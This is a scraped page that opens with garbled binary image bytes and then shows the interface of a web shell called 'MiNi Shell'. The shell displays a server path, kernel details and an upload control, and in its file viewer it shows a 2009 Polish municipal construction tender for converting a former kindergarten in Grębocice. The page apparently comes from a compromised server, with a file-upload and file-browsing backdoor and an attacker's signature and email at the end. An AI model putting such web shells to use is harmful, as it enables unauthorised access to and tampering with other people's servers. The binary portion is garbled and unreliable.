JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090226/41684-N-2009.html

<p class="kh_header"><b>Grębocice: Przebudowa ze zmianą sposobu użytkowania budynku po byłym przedszkolu na biura i bibliotekę w m. Grębocice ul. Kościelna 34</b><br>
<b>Numer ogłoszenia: 41684 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grębocice , ul. Głogowska 3, 59-150 Grębocice, woj. dolnośląskie, tel. 076 831 50 31, faks 076 8315077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grebocice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ze zmianą sposobu użytkowania budynku po byłym przedszkolu na biura i bibliotekę w m. Grębocice ul. Kościelna 34.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA
Przedmiotem zamówienia jest :Przebudowa ze zmianą sposobu użytkowania budynku byłego przedszkola na biura i bibliotekę  w miejscowości Grębocice  ul.Kościelna 34.
Prace budowlane polegać będą na adaptacji pomieszczeń  
Przebudowa  tej części obejmuje roboty rozbiórkowe ,ogólnobudowlane konstrukcyjne i wykończeniowe wraz z elewacją i elementami zewnętrznymi , instalacje sanitarne wod kan, instalacje elektryczne.   Powierzchnia użytkowa 314,43m2, kubatura  1519,68 m3.
1. ZAKRES PRZEDMIOTU ZAMÓWIENIA OBEJMUJE m.in.:
1.1. roboty rozbiórkowe
1.2.roboty ziemne ,wykopy
1.3. roboty fundamentowe i izolacyjne 
1.4. roboty murowe projektowane ściany ,kominy, przemurowania ścian, przebicia i zamurowania 
1.5. roboty konstrukcyjne wzmocnienia  ścian ,stropy ,podciągi ,klatka schodowa, więźba dachowa
1.6. roboty podłogowe i posadzkowe
1.7. roboty dociepleniowe ścian zewnętrznych wraz z boniowaniem, odtworzeniem gzymsów międzykondygnacyjnych i wieńczących ,parapety i opaski okienne ,wykończenie mineralny tynk cienkowarstwowy
1.8. roboty dachowe zerwanie  pokrycia dachowego  z płytek  eternitowych ,pokrywcze, blacharskie
1.9. roboty tynkarskie i malarskie
1.10. roboty wykończeniowe ,balustrady ,okna specjalne na poddaszu 
1.11. montaż stolarki drzwiowej 
1.12 odbudowa nawierzchni utwardzonej na zewnątrz ,wykonanie ogrodzenia 
1.13 instalacje wody zimnej i ciepłej
1.14 instalacje kanalizacji sanitarnej 
1.15 instalacje wewnętrzne co 
1.16 instalacje elektryczne
1.17.instalacja komputerowa  
1.18 instalacja odgromowa 
2. SZCZEGÓŁOWY ZAKRES ZAMÓWIENIA
2.1 Szczegółowy zakres zamówienia określa dokumentacja projektowa pt: Przebudowa ze zmianą sposobu użytkowania budynku byłego przedszkola na bibliotekę i biura w m. Grębocice ul.Kościelna 34  ,  opracowana przez Studio 4A  pracownia architektury Lubań   
2.2 W skład dokumentacji projektowej wchodzą następujące opracowania :
2.2.1 Projekt budowlano wykonawczy część architektoniczna 
2.2.2 Projekt budowlano wykonawczy część konstrukcyjna 
2.2.3 Projekt wykonawczy część instalacyjna
2.2.4 Projekt wykonawczy część elektryczna 
2.3 Zamawiający dysponuje przedmiarami robót , które załącza do SIWZ jako materiał poglądowy. Przedmiary dla Wykonawcy nie mogą stanowić podstawy do wyceny  robót brutto. Cenę brutto należy określić na podstawie dokumentacji projektowej, SIWZ, wizji w terenie.
Wykaz przedmiarów robót :
Przedmiar robót  budowlany 
Przedmiar robót inst. sanitarne 
Przedmiar robót  inst. elektryczne 
2.4 Zasilanie i organizacja zaplecza placu budowy leży w gestii Wykonawcy.
2.5 Dokumentacja projektowa do wglądu dostępna jest w Referacie Budownictwa Urzędu Gminy pok.11,  w godz. 8 00  15 00. 
3. WARUNKI REALIZACJI ROBÓT:
3.1 Należy powiadomić Zamawiającego na piśmie o terminie rozpoczęcia prac oraz z 14 dniowym
wyprzedzeniem o terminie zakończenia całości robót.
3.2 Przedstawić  harmonogram  robót rzeczowo finansowy do oferty  uwaga : przed podpisaniem umowy z wykonawcą którego oferta zostanie wybrana harmonogram robót zostanie podpisany przez dwie strony.
3.3 Wykonawca robót jest odpowiedzialny za jakość wykonywanych robót oraz zgodność wykonania z dokumentacją projektową, zaleceniami nadzoru inwestorskiego i autorskiego, obowiązującymi normami, warunkami technicznymi wykonania robót budowlano montażowych oraz sztuką budowlaną.
3.4 Wykonawca ma obowiązek zorganizować i przeprowadzić roboty w sposób bezpieczny, nie stwarzający zagrożenia dla osób przebywających na terenie Inwestycji, zgodnie z przepisami BHP. Szczególnie jest odpowiedzialny za:
3.4.1 Sporządzenie i przedłożenie Zamawiającemu przed rozpoczęciem robót, plan bezpieczeństwa i ochrony zdrowia( art.21 ust.3 prawa budowlanego), tablicy informacyjnej i ogłoszenia zawierającego dane dotyczące bezpieczeństwa i ochrony zdrowia ( art.45 ust.4 prawa budowlanego jeden egzemplarz planu bioz  należy przekazać Zamawiającemu.
3.4.2  Magazynowanie odpadów powstających podczas realizacji inwestycji może odbywać się jedynie na terenie inwestycji.
3.4.3 Prowadzenie robót budowlanych zgodnie z wymogami Rozporządzenia Ministra Infrastruktury w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlano montażowych i rozbiórkowych ( DZ.U. Nr 47 z 2003r).
3.5 Do zakresu robót i obowiązków Wykonawcy przedmiotu zamówienia w ramach ceny brutto wchodzić będzie również :
3.5.1 Organizacja i zagospodarowanie placu budowy wraz z zapleczem budowy, ponoszenie kosztów zużycia wody, kosztów energii i ogrzewania dla potrzeb budowy.
3.5.2 Zabezpieczenie terenu i miejsca prowadzenia robót przed dostępem osób trzecich.
3.5.3 Nadzór nad mieniem i ubezpieczenie budowy, prowadzenie robót w sposób bezpieczny.
3.5.4 Utrzymanie porządku w trakcie realizacji robot oraz systematyczne porządkowanie miejsc wykonywania prac.
3.5.5 Opracowanie i przekazanie Zamawiającemu dokumentacji powykonawczej w ilości 2 egz.
3.5.6 Natychmiastowe usuniecie w sposób docelowy wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót.
3.5.7 Demontaż obiektów tymczasowych i uporządkowanie terenu po zakończeniu robót.
3.5.8 Wywóz i utylizacja powstałych w trakcie wykonywania robót odpadów.Ustawa o odpadach z dnia 27.04.2001r z późniejszymi zmianami, Prawo ochrony środowiska Dz. U z 2006r ,Nr 129 poz 902 ze zmianami oraz w razie potrzeby zgłoszenia informacji o wytwarzanych odpadach do Wydziału Środowiska i Rolnictwa oraz Zamawiającego.
3.5.9 Wykonawca winien utrzymać w czystości koła pojazdów wyjeżdżających z placu budowy na ulice.
3.5.10 Czynny udział w odbiorach przez służby zewnętrzne.
3.5.11 Wykonania niezbędnych pomiarów, prób, badań uzgodnień, nadzorów i odbiorów, w tym :
pomiary geodezyjne powykonawcze,
próba szczelności instalacji c.o.,
pomiary skuteczności ochrony przeciwporażeniowej, skuteczności zerowania,
pomiar skuteczności działania wentylacji i pomiar hałasu od zamontowanych urządzeń,
pomiary rezystencji izolacji, uziemień ochronnych i roboczych,
próby ciśnieniowe instalacji,
pomiar natężenia oświetlenia, 
badanie wody przez uprawnioną  jednostkę  np. Sanepid.
3.6 Wykonawca ma obowiązek uwzględniać koszt składowania, wywozu i utylizacji odpadów w cenie  brutto.
3.7  Do wbudowania mogą być użyte materiały i urządzenia odpowiadające wymogom dokumentacji projektowej, ponadto:
3.7.1 oznaczone znakiem CE, dla których zgodnie z odrębnymi przepisami dokonano oceny zgodnie ze zharmonizowana norma europejska wprowadzona do zbioru Polskich Norm (PN HEN), z europejską aprobatą techniczną ( EAT) lub krajowa specyfikacja z wymaganiami podstawowymi,
3.7.2 znajdującymi się w określonym przez Komisję Europejską wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklaracje zgodności z uznanymi regułami sztuki budowlanej,
3.7.3 dla których producent po dokonaniu odpowiedniej procedury oceniającej wystawił deklaracje zgodności WE potwierdzająca zgodność wyrobu z europejskimi normami i aprobatami,
3.7.4. oznaczone znakiem budowlanym zgodnie z Polska Norma lub krajowa aprobata techniczna, a zgodność  ta została potwierdzona w deklaracji zgodności wydanej przez producenta,
3.7.5. wyroby przeznaczone do jednostkowego stosowania w konkretnym obiekcie budowlanym.
3.8 Przed dokonaniem zamówienia materiałów ma obowiązek przedstawić Zamawiającemu propozycje materiałowe i kolorystyczne celem akceptacji.
3.9 Wszelkie zmiany w rozwiązaniach wymagają akceptacji nadzoru autorskiego i inwestorskiego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.31.10.00-0, 45.31.60.00-5, 45.33.23.00-6, 45.33.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 15.000,00złotych słownie: piętnaście tysięcy złotych  
W przypadku wniesienia wadium w formie innej niż w pieniądzu (patrz ust. 3 punkt od 3.2 do 3.5)
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może by wnoszone w jednej lub kilku następujących formach:
3.1. pieniądzu,
3.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3. gwarancjach bankowych,
3.4. gwarancjach ubezpieczeniowych,
3.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.Nr 109,poz. 1158, z późn. zm.).
4. Wadium wnoszone w  formie pieniężnej wpłaca się na konto Urzędu Gminy :
   Bank Spółdzielczy Wschowa OGrębocice
   Nr rachunku : 10 8669 0001 0170 0002 4000 0070 
Na dowodzie wpłaty należy zaznaczyć jakiego przetargu wadium dotyczy.
Do oferty należy dołączyć kopie dowodu wpłaty wadium.
5. Wadium wnoszone w innej  formie poręczenia , gwarancji, należy złożyć w oryginale w siedzibie Zamawiającego tj.ul.Głogowska 3 59-150 Grębocice ,w kasie w godz 800-1300 nie później niż do godz 12 00 w dniu 23.03.2009r
Kopię lub kserokopię podpisaną za zgodność z oryginałem przez  Wykonawcę lub upełnomocnionego przedstawiciela dowodu wniesienia wadium należy dołączyć do oferty lub przedłożyć
zespołowi przeprowadzającego postępowanie ,przy otwarciu ofert.  
7. Zamawiający zwraca niezwłocznie wadium, jeżeli:
7.1. upłynął termin związania oferta;
7.2. zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
7.3. Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie
rozstrzygnięte lub upłynął termin do ich wnoszenia.
8. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
8.1. który wycofa ofertę przed upływem terminu składania ofert;
8.2. który został wykluczony z postępowania;
8.3. którego oferta została odrzucona.
9. Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania,wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia protestu.
10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
11.1. odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
11.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
11.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.  i ponadto:
1.5. dysponują osobami zdolnymi do realizacji zamówienia, tzn.:
a) kierownikiem budowy, który posiada uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności konstrukcyjno - budowlanej. Wymagane jest, by ww osoba była członkiem właściwej Izby Inżynierów Budownictwa;
b) kierownikami robót branżowych, którzy posiadają uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności instalacji elektrycznych oraz sieci i instalacji sanitarnych. Wymagane jest, by w/w osoby były członkami właściwej Izby Inżynierów Budownictwa.
1.6. posiadają niezbędną wiedzę i doświadczenie, tzn.:
W okresie ostatnich pięciu  lat zrealizowali minimum 1 zamówienie o charakterze i złożoności porównywalnej z robotami stanowiącymi przedmiot zamówienia, tj.: minimum 1 zamówienie związane z przebudową lub budową obiektu użyteczności publicznej o powierzchni użytkowej przebudowywanego (budowanego) obiektu co najmniej 400 m2. należy udokumentować powierzchnię.Dodatkowo należy załączyć min. dwie referencje na wykonywanie pokrycia dachowego płytkami z łupka naturalnego  dach o pow. min.300m2.Wykonawca wykona roboty pokrywcze z łupka naturalnego brygada własną lub podwykonawczą z udokumentowaniem referencji jak wyżej.

W/w roboty budowlane muszą być wykonane z należytą starannością;
1.7. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
2. W przypadku wspólnego ubiegania się o udzielnie zamówienia (art. 23 Pzp), Wykonawcy muszą:
a) ustanowić pełnomocnika (patrz punkt 17a Rozdziału II Informacje ogólne),
b) każdy z Wykonawców oddzielnie musi spełniać wymóg zawarty w ust. 1 pkt.1.4.i udokumentować,że nie podlega wykluczeniu na podstawie art. 24 ustawy,
c) wymogi zawarte w ust.1 pkt. 1.1., 1.2., 1.3. 1,5., 1.6., 1.7. Wykonawcy mogą spełniać łącznie.
3. Wykluczeniu z postępowania podlegają Wykonawcy w przypadkach określonych w art. 24 ustawy Prawo Zamówień Publicznych.
4. Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej, wg zasady spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu udokumentowania spełniania warunków udziału w postępowaniu o których mowa w Rozdziale V, Wykonawcy wraz z ofertą przedłożą oświadczenia i dokumenty wymienione w załączniku nr 3 do SIWZ Wykaz oświadczeń  i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
Do załącznika nr 3 dołączam niżej wymienione oryginalne dokumenty lub kopie potwierdzone za zgodność z oryginałem przez upełnomocnionego przedstawiciela firmy:
a)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert,
b)  aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c) pełnomocnictwo wystawione dla osoby składające ofertę ,podpisane przez osobę upoważnioną do reprezentowania Wykonawcy ,w przypadku składania oferty przez pełnomocnika.
d) wykaz wykonywanych w okresie pięciu  lat zrealizowali minimum 1 zamówienie o charakterze i złożoności
porównywalnej z robotami stanowiącymi przedmiot zamówienia związane z przebudowa lub budowa obiektu użyteczności publicznej o pow. użytkowej przebudowanego obiektu co najmniej 400m2,Dodatkową udokumentują  referencjami wykonywanie pokrycia dachowego płytkami z łupka naturalnego o pow. min. 300,0m2.  Wykonawca wykona roboty pokrywcze z łupka naturalnego brygadą własną lub podwykonawczą  z udokumentowaniem referencji jak wyżej.   
e) polisę lub inny dokument ubezpieczenia potwierdzający ,że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej ,ubezpieczenie powinno być ważne przez cały przez cały okres realizacji umowy. 
f) list intencyjny w przypadku firm występujących wspólnie podpisany przez wykonawców chcących startować wspólnie oraz dokument ustanawiający przez te podmioty wspólnego pełnomocnika
g) umowę spółki cywilnej w przypadku złożenia oferty przez przedsiębiorców występujących jako spółka cywilna
h) kopię lub kserokopię dowodu wniesienia wadium dopuszczalne jest okazanie dowodu wniesienia wadium Komisji Przetargowej w trakcie otwarcia ofert 
i) dostarczenie kosztorysu szczegółowego 
j) dostarczenie kserokopii uprawnień budowlanych oraz przynależności do Izby Budowlanej kierownika budowy i kierowników robót.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.grebocice.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Grębocicach
ul. Głogowska 3
59-150 Grebocice
pok. 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 12:00, miejsce: Urząd Gminy w Grębocicach
ul. Głogowska 3
59-150 Grebocice
pok. 2 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com